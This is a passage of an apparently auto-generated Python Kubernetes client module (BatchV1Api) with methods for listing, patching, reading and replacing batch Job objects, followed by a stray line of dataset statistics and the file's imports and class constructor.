:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1JobList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_job_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1JobList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_namespaced_job(self, namespace, **kwargs):
"""
list or watch objects of kind Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_job(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1JobList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_namespaced_job_with_http_info(namespace, **kwargs)
else:
(data) = self.list_namespaced_job_with_http_info(namespace, **kwargs)
return data
def list_namespaced_job_with_http_info(self, namespace, **kwargs):
"""
list or watch objects of kind Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_job_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1JobList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'include_uninitialized', 'pretty', '_continue', 'field_selector', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1JobList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_job(self, name, namespace, body, **kwargs):
"""
partially update the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_job(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_namespaced_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_job_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_job_with_http_info(self, name, namespace, body, **kwargs):
"""
partially update the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_job_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_job_status(self, name, namespace, body, **kwargs):
"""
partially update status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_job_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_job_status_with_http_info(self, name, namespace, body, **kwargs):
"""
partially update status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_job_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_job_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_job_status`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_job(self, name, namespace, **kwargs):
"""
read the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_job(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_namespaced_job_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_job_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_job_with_http_info(self, name, namespace, **kwargs):
"""
read the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_job_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty', 'exact', 'export']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'exact' in params:
query_params.append(('exact', params['exact']))
if 'export' in params:
query_params.append(('export', params['export']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_job_status(self, name, namespace, **kwargs):
"""
read status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_job_status(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_namespaced_job_status_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_job_status_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_job_status_with_http_info(self, name, namespace, **kwargs):
"""
read status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_job_status_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_job_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_job(self, name, namespace, body, **kwargs):
"""
replace the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_job(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_namespaced_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_job_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_job_with_http_info(self, name, namespace, body, **kwargs):
"""
replace the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_job_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_job_status(self, name, namespace, body, **kwargs):
"""
replace status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_job_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_job_status_with_http_info(self, name, namespace, body, **kwargs):
"""
replace status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_job_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_job_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_job_status`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 62.94069 | 1,390 | 0.645665 |
from __future__ import absolute_import
import sys
import os
import re
from six import iteritems
from ..api_client import ApiClient
class BatchV1Api(object):
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
